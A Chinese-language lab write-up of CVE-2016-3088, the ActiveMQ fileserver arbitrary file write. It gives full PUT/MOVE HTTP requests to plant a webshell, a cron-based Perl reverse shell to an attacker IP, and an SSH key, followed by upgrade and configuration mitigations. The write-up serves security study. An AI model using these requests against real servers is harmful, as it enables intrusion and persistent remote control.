CVE-2016-3088_ActiveMQ任意文件寫入漏洞

0x01漏洞背景

ActiveMQ的web控制臺分三個應用，admin、api和fileserver，其中admin是管理員頁面，api是接口，fileserver是儲存文件的接口；admin和api都需要登錄后才能使用，fileserver無需登錄。

fileserver是一個RESTful API接口，我們可以通過GET、PUT、DELETE等HTTP請求對其中存儲的文件進行讀寫操作，其設計目的是為了彌補消息隊列操作不能傳輸、存儲二進制文件的缺陷，但后來發現：

其使用率并不高

文件操作容易出現漏洞

所以，ActiveMQ在5.12.x~5.13.x版本中，已經默認關閉了fileserver這個應用（你可以在conf/jetty.xml中開啟之）；在5.14.0版本以后，徹底刪除了fileserver應用。

在測試過程中，可以關注ActiveMQ的版本，避免走彎路。

0x02環境搭建

利用vulhub的docker環境搭建

在/vulhub/activemq/CVE-2015-5254目錄下運行

搭建及運行漏洞環境：

docker-compose up -d

環境監聽61616端口和8161端口，其中8161為web控制臺端口，本漏洞就出現在web控制臺中。

訪問http://ip:8161/看到web頁面，說明環境已成功運行。

0x03漏洞詳情

本漏洞出現在fileserver應用中，漏洞原理其實非常簡單，就是fileserver支持寫入文件（但不解析jsp），同時支持移動文件（MOVE請求）。所以，我們只需要寫入一個文件，然后使用MOVE請求將其移動到任意位置，造成任意文件寫入漏洞。

文件寫入有幾種利用方法：

寫入webshell

寫入cron或ssh key等文件

寫入jar或jetty.xml等庫和配置文件

寫入webshell的好處是，門檻低更方便，但前面也說了fileserver不解析jsp，admin和api兩個應用都需要登錄才能訪問，所以有點雞肋；寫入cron或ssh key，好處是直接反彈拿shell，也比較方便，缺點是需要root權限；寫入jar，稍微麻煩點（需要jar的后門），寫入xml配置文件，這個方法比較靠譜，但有個雞肋點是：我們需要知道activemq的絕對路徑。

分別說一下上述幾種利用方法。

寫入webshell

前面說了，寫入webshell，需要寫在admin或api應用中，而這倆應用都需要登錄才能訪問。

默認的ActiveMQ賬號密碼均為admin，首先訪問http://your-ip:8161/admin/test/systemProperties.jsp，查看ActiveMQ的絕對路徑：

然后上傳webshell：

這里用的Burp，冰蝎馬

PUT /fileserver/2.txt HTTP/1.1 Host: xxxx:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 120976webshell...

ps：狀態碼204 No Content：服務器成功處理了請求，但沒返回任何內容

移動到web目錄下的api文件夾（/opt/activemq/webapps/api/s.jsp）中：

MOVE /fileserver/2.txt HTTP/1.1 Destination: file:///opt/activemq/webapps/api/s.jsp Host: localhost:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0

連接webshell（需要登錄）：

ps：這一步有點坑，因為需要登陸，如果傳大馬的話，直接在瀏覽器驗證admin就可以了，但我用的是冰蝎馬，所以就得把cookie信息扔到冰蝎連接的設置里，我是把整個包扔進去了的

寫入crontab，自動化彈shell

這是一個比較穩健的方法。首先上傳cron配置文件（注意，換行一定要\n，不能是\r\n，否則crontab執行會失敗）：

PUT /fileserver/1.txt HTTP/1.1 Host: xxxx:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 248*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="xxxxx";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

將其移動到/etc/cron.d/root：

MOVE /fileserver/1.txt HTTP/1.1 Destination: file:///etc/cron.d/root Host: xxxx:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0

未成功，可能是非root用戶的原因

使用ssh_key的方法

既然可以任意文件上傳和移動，很自然的可以想到上傳我們的 ssh 公鑰，從而實現 SSH 方式登錄。

首先生成密鑰對。（如果已存在則不需要）

上傳ssh公鑰

PUT /fileserver/id_rsa.pud HTTP/1.1 Host: xxxx:8161 Content-Length: 409ssh-rsa xxxxxxxxxxxxxxxxxxx

之后直接ssh登錄即可

0x04漏洞影響

漏洞影響版本：Apache ActiveMQ 5.x ~ 5.14.0

在 ZoomEye 上用 日期 和 ActiveMQ 作為關鍵詞檢索，分別探測了2015年1月1日（漏洞爆發前一年）和2017年1月1日（漏洞爆發后一年）互聯網上 ActiveMQ 的總量情況，如下。

可以看到，ActiveMQ的數量在漏洞爆發前后有很大幅度的減少，從這我們大致可以猜測漏洞爆發后很多ActiveMQ的Web服務限制了來自公網的訪問。

0x05防護方案

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級至 5.14.0 及其以后版本。

2、通過移除 conf\jetty.xml 的以下配置來禁用 ActiveMQ Fileserver 功能

總結

以上是生活随笔為你收集整理的【安全狐】CVE-2016-3088_ActiveMQ任意文件写入漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。